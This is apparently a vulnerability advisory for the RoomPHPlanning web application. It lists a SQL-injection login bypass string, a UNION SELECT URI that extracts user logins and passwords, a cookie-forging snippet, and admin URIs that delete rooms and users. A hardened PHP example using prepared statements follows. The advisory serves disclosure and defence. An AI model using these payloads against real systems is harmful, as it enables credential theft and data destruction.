RoomPHPlanning Multiple Vulnerabilities
Attackers can use a browser to exploit these issues.

The following example input is available:

username:real_user' or '1=1
password:ThE g0bL!N

The following example code is available:

setcookie($cookie,$idus,time()+3600,"/");
=> $cookiename=room_phplanning
$idus= user_id

The following example URIs are available:

(to perform SQL-injection attacks)
http://www.example.com/admin/userform.php?id=-1+union+select+1,concat(LoginUs,0x3a,PwdUs),3+FROM+rp_user+where%20IdUs=1--

(to delete rooms and users)
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?room=$room id
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?room=1
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?user=user id
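
A hardened form of the two database lookups these inputs target, as an added example that is not RoomPHPlanning's own code. It assumes PDO with an in-memory SQLite table that reuses the rp_user column names above, hashed passwords, and the hypothetical helper names find_user and check_login.

```php
<?php
// Added example: constructed in-memory table reusing the rp_user column names
// from the advisory. The stored password is a constructed sample value.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rp_user (IdUs INTEGER PRIMARY KEY, LoginUs TEXT, PwdUs TEXT)');
$ins = $db->prepare('INSERT INTO rp_user (IdUs, LoginUs, PwdUs) VALUES (?, ?, ?)');
$ins->execute([1, 'real_user', password_hash('constructed-password', PASSWORD_DEFAULT)]);

// Lookup by id (the userform.php?id= case): accept only a positive integer,
// then bind it as a parameter instead of concatenating it into the SQL text.
function find_user(PDO $db, string $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $st = $db->prepare('SELECT IdUs, LoginUs FROM rp_user WHERE IdUs = :id');
    $st->execute([':id' => $id]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Login check: the user name is bound as data, and the password is compared
// against a stored hash rather than inside the SQL statement.
function check_login(PDO $db, string $login, string $password): ?int {
    $st = $db->prepare('SELECT IdUs, PwdUs FROM rp_user WHERE LoginUs = :login');
    $st->execute([':login' => $login]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['PwdUs'])) {
        return null;
    }
    return (int) $row['IdUs'];
}

// The inputs listed in the advisory are handled as plain data and match no row;
// the legitimate values that follow them still work.
var_dump(check_login($db, "real_user' or '1=1", 'ThE g0bL!N'));
var_dump(find_user($db, '-1 union select 1,concat(LoginUs,0x3a,PwdUs),3 FROM rp_user where IdUs=1--'));
var_dump(check_login($db, 'real_user', 'constructed-password'));
var_dump(find_user($db, '1'));
```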